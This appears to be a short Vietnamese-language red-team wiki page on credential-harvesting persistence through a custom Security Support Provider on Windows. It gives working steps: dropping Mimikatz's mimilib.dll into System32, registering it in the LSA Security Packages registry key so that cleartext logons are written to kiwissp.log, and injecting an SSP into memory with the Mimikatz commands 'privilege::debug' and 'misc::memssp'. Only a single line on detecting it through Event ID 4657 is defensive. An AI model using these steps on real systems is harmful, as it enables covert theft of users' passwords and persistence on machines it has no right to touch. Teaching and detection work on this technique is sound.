Custom SSP
Custom SSP
Learn what is a SSP (Security Support Provider) here. Bạn có thể tạo SSP của riêng mình để ghi lại dưới dạng clear text các thông tin đăng nhập được sử dụng để truy cập vào máye.
Mimilib
mimilib.dll
trong Mimikatz: Ghi vào tệp tất cả thông tin xác thực ở dạng rõ
Thả tệp dll vào C:\Windows\System32\
Nhận danh sác LSA Security Packages:
attacker@target
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
Thêm mimilib.dll
vào Security Support Provider list (Security Packages):
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
Và sau khi khởi đông lại tất cả thông tin xác thực có thể tìm thấy ở dạng rõ trong C:\Windows\System32\kiwissp.log
In memory
Có thể inject trực tiếp vào bộ nhớ bằng Mimikatz (lệnh này có thể không ổn định/không hoạt động):
privilege::debug
misc::memssp
Biến mất sau khi reboot.
Mitigation
Event ID 4657 - Audit creation/change of HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
Last updated